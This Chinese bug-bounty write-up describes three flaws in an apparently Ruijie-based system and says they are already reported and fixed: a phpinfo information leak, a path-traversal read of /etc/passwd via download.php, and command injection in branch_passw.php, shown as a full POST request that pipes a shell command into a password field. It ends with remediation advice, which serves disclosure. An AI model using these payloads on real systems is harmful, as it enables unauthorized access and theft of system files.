记第一次eudsrc拿到RCE(下)

简介: 本文是关于网络安全的漏洞测试报告。作者强调所有漏洞已上报并修复,提醒读者不得用于非法目的。文章介绍了三种类型的漏洞:信息泄露、任意文件读取和远程命令执行(RCE)。通过前台CLI命令执行漏洞获取管理员密码后,发现了后台的任意文件读取和RCE漏洞。最后,提出了修复建议,包括限制文件访问、严格验证用户输入以及避免不安全的编程实践。鼓励持续学习和细心观察,以发现潜在的安全问题。

前言



版权声明:本文为本博主在CSDN的原创文章搬运而来,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。                            

原文链接:https://blog.csdn.net/weixin_72543266/article/details/137440839

                                                                   免责声明

    以下漏洞均已经上报漏洞平台并已修复。请勿利用文章内的相关技术从事非法测试。若因此产生一切后果与本博客,阿里云平台及本人无关。

 仅接上一篇文章,本来都准备结束了,结果搜索文库,发现文库中还有这个系统没有进行测试的漏洞,既然RCE都有,那其他的会不会有呢,抱着试试的心态进行尝试,成功拿到第二个RCE.

                 

挖洞公式

                              运气+长期积累+感想敢做+耐心+细心

漏洞介绍

信息泄露漏洞

 漏洞通常由于不当的信息处理和传输造成,比如在错误消息、日志文件或者网页源代码中暴露敏感数据。这些数据可能包括软件版本信息、配置文件内容、用户个人信息等。利用这些信息,攻击者可以对系统进行更有针对性的攻击。

任意文件读取漏洞

 漏洞允许未经授权的用户读取服务器上的任意文件,通常是由于应用程序在处理文件读取请求时没有正确的验证用户输入。通过这种漏洞,攻击者可以获取任意包含敏感信息的文档、配置文件或者其他不应公开的数据。

远程命令执行(RCE)漏洞

 RCE漏洞是最危险的漏洞之一,它允许攻击者在没有任何身份验证的情况下远程执行代码或命令。产生RCE的原因通常是由于应用程序使用了不安全的编程实践,比如使用eval()函数执行用户输入的字符串作为代码,或者通过调system()、exec()等函数执行由用户控制的命令。

漏洞详情

还是这个页面,惊喜不,没想到前台还是会存在漏洞,本次就从存在常见的未授权,开始测试

image.gif

漏洞点1

前台存在phpinfo.view.php页面存在信息泄露漏洞直接在url后进行拼接:

poc:

/tool/view/phpinfo.view.php

image.gif

image.gif

通过使用前台CLI命令执行漏洞获得的管理员密码进行登录 admin/xxxxxxxxxx 进入后台

漏洞点2

后台download.php页面存在任意文件读取漏洞,在url后直接拼接poc

poc:

/download.php?a=read_txt&file=../../../../etc/passwd

image.gif

image.gif

漏洞点3

后台branch_passw.php页面存在远程命令执行漏洞(RCE),这里执行远程命令读取密码文件,写入到test_test.txt中

poc:

POST /itbox_pi/branch_passw.php?a=set HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=    xxxxxxxx            ;user=admin;
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
pass=|cat /etc/psswd>../test_test.txt

image.gif

在url后直接拼接/test_test.txt进行访问,存在文件并且返回信息,说明RCE执行成功

image.gif

修复建议

   针对前台存在的phpinfo.view.php信息泄露漏洞,建议删除或限制访问该文件,以防止敏感信息泄露。对于后台download.php的任意文件读取漏洞,建议对用户输入进行严格的验证和过滤,确保只允许访问合法文件,并限制可下载的文件类型。针对branch_passw.php页面的远程命令执行(RCE)漏洞,建议对用户输入进行严格的验证和过滤,避免使用不安全的函数,如eval()和exec(),并确保使用最新的安全补丁和配置。同时,可以考虑使用安全编程实践,如参数化查询和预编译语句,以降低安全风险。

总结

   对一个系统进行渗透过程中需要多查看现有页面的title,技术支持和属性的ico,和特殊的文件名(js)等,当然这些也是通过多看文章和思考长期积累而来的,需要坚持,耐心,细心,这次我就是灵光一闪想到了,这个系统就被拿下了,说不定你也能在无意之间碰到呢。

相关文章
|
5月前
|
监控 安全 网络安全
初探rce中的无参数rce
无参数RCE虽然不常见,但其隐蔽性和潜在的破坏性使得它成为一种特别危险的安全威胁。防御这类攻击要求开发者和系统管理员具备深刻的安全意识和综合的安全策略。通过持续的安全培训、审计以及运用行业最佳实践,可以有效降低这类风险。安全是一个持续的过程,而不是一次性任务,面对日益复杂的安全威胁,持续的努力和关注是保障数字资产安全的关键。
69 1
|
7月前
|
SQL 监控 安全
记第一次eudsrc拿到RCE(上)
本文是一篇关于网络安全的漏洞分析报告,首先声明所有漏洞已修复,并警告读者不得用于非法活动。文章介绍了通过信息收集和复现研究,发现了一个CLI命令注入和RCE漏洞。这两个漏洞分别存在于登录页面的用户输入和后台接口中,允许攻击者执行恶意命令。作者提供了POC(Proof of Concept)代码,并展示了如何利用这些漏洞。最后,给出了修复建议,包括更新设备固件、加强访问控制、限制不必要的服务等,并强调了持续学习和关注安全公告的重要性。
|
安全 Python Windows
RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。 该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。 从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。
156 2
|
XML 安全 Java
WebLogic EJBTaglibDescriptor XXE漏洞(CVE-2019-2888)
WebLogic EJBTaglibDescriptor 在反序列化的同时会进行XML解析,通过重写EJBTaglibDescriptor中的writeExternal函数生成恶意的序列化数据。
303 1
|
安全 测试技术
漏洞复现--CVE-2020-0796getshell
漏洞复现--CVE-2020-0796getshell
漏洞复现--CVE-2020-0796getshell
|
XML 安全 Oracle
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
160 0
|
安全 Shell 数据安全/隐私保护
CVE-2019-15107 Webmin RCE漏洞复现
环境搭建: 进入镜像目录
384 0
|
安全 调度 PHP
Thinkphp5.0.*之RCE漏洞分析
Thinkphp5.0.*之RCE漏洞分析
|
XML Web App开发 安全
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
|
云安全 安全 druid
Log4j2_RCE漏洞复现
Log4j2_RCE漏洞复现
198 0

热门文章

最新文章